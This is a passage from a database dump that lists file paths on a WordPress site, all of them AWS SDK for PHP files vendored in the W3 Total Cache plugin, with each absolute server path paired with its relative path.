pi/Parser/XmlParser.php'),(4841,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/Serializer/Ec2ParamBuilder.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/Serializer/Ec2ParamBuilder.php'),(4842,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/Serializer/JsonBody.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/Serializer/JsonBody.php'),(4843,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/Serializer/JsonRpcSerializer.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/Serializer/JsonRpcSerializer.php'),(4844,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/Serializer/QueryParamBuilder.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/Serializer/QueryParamBuilder.php'),(4845,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/Serializer/QuerySerializer.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/Serializer/QuerySerializer.php'),(4846,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/Serializer/RestJsonSerializer.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/Serializer/RestJsonSerializer.php'),(4847,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/Serializer/RestSerializer.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/Serializer/RestSerializer.php'),(4848,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/Serializer/RestXmlSerializer.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/Serializer/RestXmlSerializer.php'),(4849,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/Serializer/XmlBody.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/Serializer/XmlBody.php'),(4850,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/Service.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/Service.php'),(4851,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/Shape.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/Shape.php'),(4852,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/ShapeMap.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/ShapeMap.php'),(4853,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/StructureShape.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/StructureShape.php'),(4854,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/TimestampShape.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/TimestampShape.php'),(4855,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/Validator.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Api/Validator.php'),(4856,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApiGateway/ApiGatewayClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApiGateway/ApiGatewayClient.php'),(4857,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApiGateway/Exception/ApiGatewayException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApiGateway/Exception/ApiGatewayException.php'),(4858,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApiGatewayManagementApi/ApiGatewayManagementApiClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApiGatewayManagementApi/ApiGatewayManagementApiClient.php'),(4859,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApiGatewayManagementApi/Exception/ApiGatewayManagementApiException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApiGatewayManagementApi/Exception/ApiGatewayManagementApiException.php'),(4860,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApiGatewayV2/ApiGatewayV2Client.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApiGatewayV2/ApiGatewayV2Client.php'),(4861,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApiGatewayV2/Exception/ApiGatewayV2Exception.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApiGatewayV2/Exception/ApiGatewayV2Exception.php'),(4862,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppConfig/AppConfigClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppConfig/AppConfigClient.php'),(4863,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppConfig/Exception/AppConfigException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppConfig/Exception/AppConfigException.php'),(4864,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppIntegrationsService/AppIntegrationsServiceClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppIntegrationsService/AppIntegrationsServiceClient.php'),(4865,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppIntegrationsService/Exception/AppIntegrationsServiceException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppIntegrationsService/Exception/AppIntegrationsServiceException.php'),(4866,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppMesh/AppMeshClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppMesh/AppMeshClient.php'),(4867,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppMesh/Exception/AppMeshException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppMesh/Exception/AppMeshException.php'),(4868,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppRegistry/AppRegistryClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppRegistry/AppRegistryClient.php'),(4869,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppRegistry/Exception/AppRegistryException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppRegistry/Exception/AppRegistryException.php'),(4870,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppRunner/AppRunnerClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppRunner/AppRunnerClient.php'),(4871,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppRunner/Exception/AppRunnerException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppRunner/Exception/AppRunnerException.php'),(4872,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppSync/AppSyncClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppSync/AppSyncClient.php'),(4873,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppSync/Exception/AppSyncException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AppSync/Exception/AppSyncException.php'),(4874,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Appflow/AppflowClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Appflow/AppflowClient.php'),(4875,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Appflow/Exception/AppflowException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Appflow/Exception/AppflowException.php'),(4876,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApplicationAutoScaling/ApplicationAutoScalingClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApplicationAutoScaling/ApplicationAutoScalingClient.php'),(4877,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApplicationAutoScaling/Exception/ApplicationAutoScalingException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApplicationAutoScaling/Exception/ApplicationAutoScalingException.php'),(4878,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApplicationCostProfiler/ApplicationCostProfilerClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApplicationCostProfiler/ApplicationCostProfilerClient.php'),(4879,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApplicationCostProfiler/Exception/ApplicationCostProfilerException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApplicationCostProfiler/Exception/ApplicationCostProfilerException.php'),(4880,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApplicationDiscoveryService/ApplicationDiscoveryServiceClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApplicationDiscoveryService/ApplicationDiscoveryServiceClient.php'),(4881,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApplicationDiscoveryService/Exception/ApplicationDiscoveryServiceException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApplicationDiscoveryService/Exception/ApplicationDiscoveryServiceException.php'),(4882,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApplicationInsights/ApplicationInsightsClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApplicationInsights/ApplicationInsightsClient.php'),(4883,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApplicationInsights/Exception/ApplicationInsightsException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ApplicationInsights/Exception/ApplicationInsightsException.php'),(4884,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Appstream/AppstreamClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Appstream/AppstreamClient.php'),(4885,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Appstream/Exception/AppstreamException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Appstream/Exception/AppstreamException.php'),(4886,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/AccessPointArn.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/AccessPointArn.php'),(4887,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/AccessPointArnInterface.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/AccessPointArnInterface.php'),(4888,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/Arn.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/Arn.php'),(4889,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/ArnInterface.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/ArnInterface.php'),(4890,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/ArnParser.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/ArnParser.php'),(4891,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/Exception/InvalidArnException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/Exception/InvalidArnException.php'),(4892,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/ObjectLambdaAccessPointArn.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/ObjectLambdaAccessPointArn.php'),(4893,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/ResourceTypeAndIdTrait.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/ResourceTypeAndIdTrait.php'),(4894,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/S3/AccessPointArn.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/S3/AccessPointArn.php'),(4895,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/S3/BucketArnInterface.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/S3/BucketArnInterface.php'),(4896,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/S3/OutpostsAccessPointArn.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/S3/OutpostsAccessPointArn.php'),(4897,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/S3/OutpostsArnInterface.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/S3/OutpostsArnInterface.php'),(4898,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/S3/OutpostsBucketArn.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Arn/S3/OutpostsBucketArn.php'),(4899,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Athena/AthenaClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Athena/AthenaClient.php'),(4900,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Athena/Exception/AthenaException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Athena/Exception/AthenaException.php'),(4901,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AuditManager/AuditManagerClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AuditManager/AuditManagerClient.php'),(4902,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AuditManager/Exception/AuditManagerException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AuditManager/Exception/AuditManagerException.php'),(4903,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AugmentedAIRuntime/AugmentedAIRuntimeClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AugmentedAIRuntime/AugmentedAIRuntimeClient.php'),(4904,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AugmentedAIRuntime/Exception/AugmentedAIRuntimeException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AugmentedAIRuntime/Exception/AugmentedAIRuntimeException.php'),(4905,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AutoScaling/AutoScalingClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AutoScaling/AutoScalingClient.php'),(4906,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AutoScaling/Exception/AutoScalingException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AutoScaling/Exception/AutoScalingException.php'),(4907,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AutoScalingPlans/AutoScalingPlansClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AutoScalingPlans/AutoScalingPlansClient.php'),(4908,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AutoScalingPlans/Exception/AutoScalingPlansException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AutoScalingPlans/Exception/AutoScalingPlansException.php'),(4909,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AwsClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AwsClient.php'),(4910,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AwsClientInterface.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AwsClientInterface.php'),(4911,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AwsClientTrait.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/AwsClientTrait.php'),(4912,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Backup/BackupClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Backup/BackupClient.php'),(4913,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Backup/Exception/BackupException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Backup/Exception/BackupException.php'),(4914,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Batch/BatchClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Batch/BatchClient.php'),(4915,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Batch/Exception/BatchException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Batch/Exception/BatchException.php'),(4916,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Braket/BraketClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Braket/BraketClient.php'),(4917,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Braket/Exception/BraketException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Braket/Exception/BraketException.php'),(4918,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Budgets/BudgetsClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Budgets/BudgetsClient.php'),(4919,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Budgets/Exception/BudgetsException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Budgets/Exception/BudgetsException.php'),(4920,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CacheInterface.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CacheInterface.php'),(4921,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Chime/ChimeClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Chime/ChimeClient.php'),(4922,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Chime/Exception/ChimeException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Chime/Exception/ChimeException.php'),(4923,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ClientResolver.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ClientResolver.php'),(4924,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ClientSideMonitoring/AbstractMonitoringMiddleware.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ClientSideMonitoring/AbstractMonitoringMiddleware.php'),(4925,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ClientSideMonitoring/ApiCallAttemptMonitoringMiddleware.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ClientSideMonitoring/ApiCallAttemptMonitoringMiddleware.php'),(4926,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ClientSideMonitoring/ApiCallMonitoringMiddleware.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ClientSideMonitoring/ApiCallMonitoringMiddleware.php'),(4927,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ClientSideMonitoring/Configuration.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ClientSideMonitoring/Configuration.php'),(4928,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ClientSideMonitoring/ConfigurationInterface.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ClientSideMonitoring/ConfigurationInterface.php'),(4929,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ClientSideMonitoring/ConfigurationProvider.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ClientSideMonitoring/ConfigurationProvider.php'),(4930,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ClientSideMonitoring/Exception/ConfigurationException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ClientSideMonitoring/Exception/ConfigurationException.php'),(4931,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ClientSideMonitoring/MonitoringMiddlewareInterface.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ClientSideMonitoring/MonitoringMiddlewareInterface.php'),(4932,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Cloud9/Cloud9Client.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Cloud9/Cloud9Client.php'),(4933,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Cloud9/Exception/Cloud9Exception.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Cloud9/Exception/Cloud9Exception.php'),(4934,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudDirectory/CloudDirectoryClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudDirectory/CloudDirectoryClient.php'),(4935,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudDirectory/Exception/CloudDirectoryException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudDirectory/Exception/CloudDirectoryException.php'),(4936,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudFormation/CloudFormationClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudFormation/CloudFormationClient.php'),(4937,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudFormation/Exception/CloudFormationException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudFormation/Exception/CloudFormationException.php'),(4938,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudFront/CloudFrontClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudFront/CloudFrontClient.php'),(4939,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudFront/CookieSigner.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudFront/CookieSigner.php'),(4940,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudFront/Exception/CloudFrontException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudFront/Exception/CloudFrontException.php'),(4941,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudFront/Signer.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudFront/Signer.php'),(4942,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudFront/UrlSigner.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudFront/UrlSigner.php'),(4943,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudHSMV2/CloudHSMV2Client.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudHSMV2/CloudHSMV2Client.php'),(4944,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudHSMV2/Exception/CloudHSMV2Exception.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudHSMV2/Exception/CloudHSMV2Exception.php'),(4945,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudHsm/CloudHsmClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudHsm/CloudHsmClient.php'),(4946,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudHsm/Exception/CloudHsmException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudHsm/Exception/CloudHsmException.php'),(4947,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudSearch/CloudSearchClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudSearch/CloudSearchClient.php'),(4948,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudSearch/Exception/CloudSearchException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudSearch/Exception/CloudSearchException.php'),(4949,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudSearchDomain/CloudSearchDomainClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudSearchDomain/CloudSearchDomainClient.php'),(4950,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudSearchDomain/Exception/CloudSearchDomainException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudSearchDomain/Exception/CloudSearchDomainException.php'),(4951,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudTrail/CloudTrailClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudTrail/CloudTrailClient.php'),(4952,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudTrail/Exception/CloudTrailException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudTrail/Exception/Clo